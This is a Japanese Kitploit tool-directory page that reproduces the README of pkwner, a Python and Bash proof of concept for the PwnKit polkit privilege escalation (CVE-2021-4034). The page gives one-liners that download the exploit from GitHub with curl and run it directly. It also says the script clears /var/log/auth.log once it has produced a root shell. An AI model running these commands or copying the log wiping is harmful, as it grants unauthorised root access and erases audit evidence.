Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
pkwner — # CVE-2021-4034 のpython3およびbash PoC(Kim Schulz作) | Kitploit
ツール/GitHubGitHub/kimusan/pkwner
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミング
GitHubkimusan/pkwner

pkwner

# CVE-2021-4034 のpython3およびbash PoC(Kim Schulz作)

リポジトリを見る
23764年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
Kim Schulz による CVE-2021-4034 用の Python3 および BASH PoC

はじめに

これは、新たに発見された Polkit の脆弱性 PwnKit のシンプルな PoC です。

bash と python3 スクリプトの両方を作成しました。単に楽しみのためです。

この問題は悪用が非常に簡単ですが、影響は甚大で、ローカルユーザーアクセス権を持つ攻撃者がいるほとんどの Linux マシンで簡単に root アクセスを取得できます。

実行方法

これらのスクリプトはワンショット実行なので、単純に以下のように実行します。

root@kitploit:~
python3 pkwner.py

または

root@kitploit:~
bash pkwner.sh

ウェブサーバー(例: この GitHub リポジトリ)から直接実行することもできます。

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

または

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

どちらの場合も、次のような出力になるはずです: alt text および alt text

スクリプトはいくつかのファイルとフォルダを作成しますが、root シェルが起動した後は自身でクリーンアップします。さらに /var/log/auth.log もクリーンアップします(なぜなら、そうしない理由がないからです)。

クレジット

  • 問題を発見し、情報を公開してくれた Qualys
  • 最初の PoC の 1 つを作成し、インスピレーションを与えてくれた Andris Raugulis
  • misgang@Kalmarunionen はバッドアスなので MiscGang
ツールをダウンロード